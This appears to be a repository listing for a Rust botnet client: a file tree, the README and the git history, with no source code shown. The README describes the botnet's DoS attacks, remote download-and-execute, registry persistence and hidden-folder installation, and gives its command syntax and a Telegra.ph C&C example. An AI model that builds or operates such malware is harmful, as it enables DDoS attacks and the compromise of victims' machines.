======================: FILES :======================
rust_botnet
├── Cargo.toml
├── LICENSE
├── README.md
└── src
    ├── callback.rs
    ├── cmd.rs
    ├── config.rs
    ├── funcs.rs
    ├── main.rs
    ├── setuper.rs
    ├── variables.rs
    ├── vm_av_detector.rs
    └── web.rs

1 directory, 12 files
======================: README CONTENT :======================
# Rust Botnet
Example botnet client which uses Telegra.ph as a C&C server.

## Features
* DoS attack feature.
* Loader & Executer of any files.
* Update feature.
* Program adds itself to autoload register and moves to hidden folder in C:/ drive root.
* Botnet deletion by command.

Notice, that this is not production ready version. 
There are many bugs which are waiting for a fix.

## Example & List of commands
Example of a C&C server is located [here](https://telegra.ph/Cls93sog103ekfSfKTEsto294kfaozwkd394-rktkcsd-krfasseegpe11-03-20).
Botnet uses the next syntax - `command{split}value` or `command{split}value{sep}value's_value`
### Available commands
* `download_exec{split}LINK_TO_FILE` - download and run a file which is located at `LINK_TO_FILE`.
* `ddos{split}TARGET{sep}TIME` - ddos a `TARGET` for `TIME` seconds.
* `upgrade{split}LINK_TO_FILE{sep}VERSION` - download and install an update which is located at `LINK_TO_FILE`. Update will be installed only if botnet's file version is lower than `VERSION`.
* `stop{split}` - you should use that command to stop the previous command execution.
* `delete_botnet{split}` - delete the botnet and it's registry notes from the client's PC.
* `exit{split}` - close botnet's executable file.

## Help
If you need any help at all, feel free to post a issue.
 
## Contributing
Contributing is encouraged and will help make a better program. Please refer to [this](https://github.com/MarcDiethelm/contributing/blob/master/README.md) before contributing.

## Disclaimer
This program must be used for educational purposes only!
I am not responsible for anything you do with it.

## Licence
This project is licensed under the MIT License - see the [LICENSE.md](https://github.com/Ookldev/rust_botnet/blob/master/LICENSE) file for details.
====================== GIT HISTORY: ======================
147b582 HEAD@{0}: clone: from https://github.com/Blaumaus/rust_botnet
commit 147b582f34aa60529808358a1e1d8892aecaad28
Author: Andrii R <35810911+Blaumaus@users.noreply.github.com>
Date:   Fri Jan 7 01:25:33 2022 +0000

    Update README.md

commit dc5f435b57ba0f0abc6cbbb1451bc836b292d3e9
Author: Andrew R <durexp@protonmail.ch>
Date:   Sat Feb 1 22:09:10 2020 +0000

    Erased some shit code

commit a924aa7dd99055c35d5af5c6e31f4acd867b98cd
Merge: 6b79dc8 2b4b282
Author: Ookldev <ingaaboo@tutanota.de>
Date:   Fri May 31 00:51:48 2019 +0300

    Merge branch 'master' of https://github.com/Ookldev/rust_botnet

commit 6b79dc89db335817ac06782bd49cacdc62cc1d26
Author: Ookldev <ingaaboo@tutanota.de>
Date:   Fri May 31 00:51:02 2019 +0300

    Minor update

commit 2b4b282e84fad326ae3516ea9ae3ffa7e6e7a213
Author: Andrij <35810911+Ookldev@users.noreply.github.com>
Date:   Fri May 31 00:01:14 2019 +0300

    Update README.md

commit 2e4340ca3a736b983a73f36ff56ed840a5d2c747
Author: Ookldev <ingaaboo@tutanota.de>
Date:   Fri May 31 00:00:03 2019 +0300

    Some changes

commit 54aa995715bf18d16152ef3a3734d45c35b948e2
Author: Ookldev <ingaaboo@tutanota.de>
Date:   Thu May 30 23:59:49 2019 +0300

    Edit README

commit 17f92c5d672e97ff1ef0a219f98c92fb6b7d6a06
Author: Andrij <35810911+Ookldev@users.noreply.github.com>
Date:   Tue Apr 30 13:24:41 2019 +0300

    Update README.md

commit dfa64fbf94f5af332968f8e0488130c29b0ae595
Author: Ookldev <ingaaboo@tutanota.de>
Date:   Tue Apr 30 13:23:03 2019 +0300

    First commit

commit dbb055673e5d34e348674ba726bc2867564edf0c
Author: Andrij <35810911+Ookldev@users.noreply.github.com>
Date:   Tue Apr 30 03:40:37 2019 +0300

    README update

commit d0d754e3668fd5eb916f5f5745c6891c41e2fdb4
Author: Andrij <35810911+Ookldev@users.noreply.github.com>
Date:   Tue Apr 30 03:18:40 2019 +0300

    Update README.md

commit 30a080d57ca34b27ca35239ed999e6bb7ef1314c
Author: Andrij <35810911+Ookldev@users.noreply.github.com>
Date:   Tue Apr 30 03:11:46 2019 +0300

    README.md update

commit e5232c4f992bae4e34f2b7c91b268448d00f951f
Author: Andrij <35810911+Ookldev@users.noreply.github.com>
Date:   Tue Apr 30 03:10:57 2019 +0300

    README.md update

commit 5c6b7dee1eda3ed6e7f193174747bb6ed8ce9d87
Author: Andrij <35810911+Ookldev@users.noreply.github.com>
Date:   Tue Apr 30 03:10:07 2019 +0300

    Update README.md

commit 08543fea3e1060807cc8635e6c2f2e327c62b7a3
Author: Andrij <35810911+Ookldev@users.noreply.github.com>
Date:   Tue Apr 30 02:53:35 2019 +0300

    Initial commit
